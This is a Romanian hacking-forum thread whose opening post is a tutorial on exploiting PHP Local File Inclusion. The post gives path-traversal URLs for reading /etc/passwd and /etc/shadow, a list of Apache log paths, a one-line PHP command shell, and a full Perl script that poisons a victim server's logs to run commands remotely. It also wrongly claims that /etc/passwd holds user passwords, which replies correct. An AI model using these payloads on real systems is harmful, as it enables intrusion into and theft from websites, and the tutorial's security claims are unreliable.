Castiel Posted December 8, 2013 Report Share Posted December 8, 2013 Salut , rst! In acest tutorial o sa invatati cum cum sa exploatati vulnerabilitatea LFI dintr-un site.Mai intai, sa vedem acest mic cod php:$page = $_GET[/page][page];include($page);?><?phpAcesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata.Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod:site.host/index.php?page=../../../../../../../etc/passwdDaca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola. O parola criptata, ar trebui sa arate cam asa:username:x:503:100:FullName:/home/username:/bin/shIn acest exemplu, parola este x, alt exemplu de parola fiind:username:!:503:100:FullName:/home/username:/bin/shAlte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi:/etc/group/etc/security/group/etc/security/passwd/etc/security/user/etc/security/environ/etc/security/limits/etc/shadowIn caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii , serverul va omite tot ce scrie dupa .Exemplu de cod:site.host/index.php?file=../../../../../../../../etc/passwdAcum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.Cateva adrese de loguri:../apache/logs/access.log../../apache/logs/error.log../../apache/logs/access.log../../../apache/logs/error.log../../../apache/logs/access.log../../../../../../../etc/httpd/logs/acces_log../../../../../../../etc/httpd/logs/acces.log../../../../../../../etc/httpd/logs/error_log../../../../../../../etc/httpd/logs/error.log../../../../../../../var/www/logs/access_log../../../../../../../var/www/logs/access.log../../../../../../../usr/local/apache/logs/access_log../../../../../../../usr/local/apache/logs/access.log../../../../../../../var/log/apache/access_log../../../../../../../var/log/apache2/access_log../../../../../../../var/log/apache/access.log../../../../../../../var/log/apache2/access.log../../../../../../../var/log/access_log../../../../../../../var/log/access.log../../../../../../../var/www/logs/error_log../../../../../../../var/www/logs/error.log../../../../../../../usr/local/apache/logs/error_log../../../../../../../usr/local/apache/logs/error.log../../../../../../../var/log/apache/error_log../../../../../../../var/log/apache2/error_log../../../../../../../var/log/apache/error.log../../../../../../../var/log/apache2/error.log../../../../../../../var/log/error_log../../../../../../../var/log/error.log../apache/logs/error.logOk, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: <? passthru(\$_GET[cmd]) ?>. Daca scriem in browser:site.host/<? passthru(\$_GET[cmd]) ?>O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in:site.host/<? passthru(\$_GET[cmd]) ?>Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl:use IO::Socket;use LWP::UserAgent;$site="victim.com";$path="/folder/";$code="<? passthru(\$_GET[cmd]) ?>";$log = "../../../../../../../etc/httpd/logs/error_log";print "Trying to inject the code";$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n";print $socket "GET ".$path.$code." HTTP/1.1\r\n";print $socket "User-Agent: ".$code."\r\n";print $socket "Host: ".$site."\r\n";print $socket "Connection: close\r\n\r\n";close($socket);print "\nCode $code sucssefully injected in $log \n";print "\nType command to run or exit to end: ";$cmd = <STDIN>;while($cmd !~ "exit") {$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die "\nConnection Failed.\n\n"; print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1\r\n"; print $socket "Host: ".$site."\r\n"; print $socket "Accept: */*\r\n"; print $socket "Connection: close\r\n\n"; while ($show = <$socket>) { print $show; }print "Type command to run or exit to end: ";$cmd = <STDIN>;}#!/usr/bin/perl -w Quote Link to comment Share on other sites More sharing options...
SilenTx0 Posted December 8, 2013 Report Share Posted December 8, 2013 Sursa? Sau ai impresia ca daca schimbi unul maxim doua cuvinte e facut de tine tutorialul?Rusine! Quote Link to comment Share on other sites More sharing options...
Active Members dancezar Posted December 8, 2013 Active Members Report Share Posted December 8, 2013 cam auirea scris "unde puteti gasi parolele in afara de /etc/passwd ar cam fi:" etc/passwd nu are parole .apoi ai uitat sa spui de null byte %00 cand scriptul iti pune .php la urma .Si unde is metodele php://input si php://filter ? Quote Link to comment Share on other sites More sharing options...
Castiel Posted December 8, 2013 Author Report Share Posted December 8, 2013 Am spus eu ca este facut de mine:))? Este dupa pro-area eu doar am modificat unele greselii . Quote Link to comment Share on other sites More sharing options...
Castiel Posted December 8, 2013 Author Report Share Posted December 8, 2013 askwrite aveai nevoie de +1 ? ON : LFI - Local File Inclusion Quote Link to comment Share on other sites More sharing options...
SilenTx0 Posted December 8, 2013 Report Share Posted December 8, 2013 Din moment ce nu ai postat sursa, se intelege ca e facut de tine:) nu e nevoie sa mai mentionezi asta. Quote Link to comment Share on other sites More sharing options...
aelius Posted December 8, 2013 Report Share Posted December 8, 2013 (edited) Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd si codul de mai sus ne arata aceste parole si usernameurile.Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.O parola criptata, ar trebui sa arate cam asa: username:x:503:100:FullName:/home/username:/bin/shAu, muma ... Edited December 8, 2013 by aelius Quote Link to comment Share on other sites More sharing options...
Active Members akkiliON Posted December 8, 2013 Active Members Report Share Posted December 8, 2013 Au, muma ... Quote Link to comment Share on other sites More sharing options...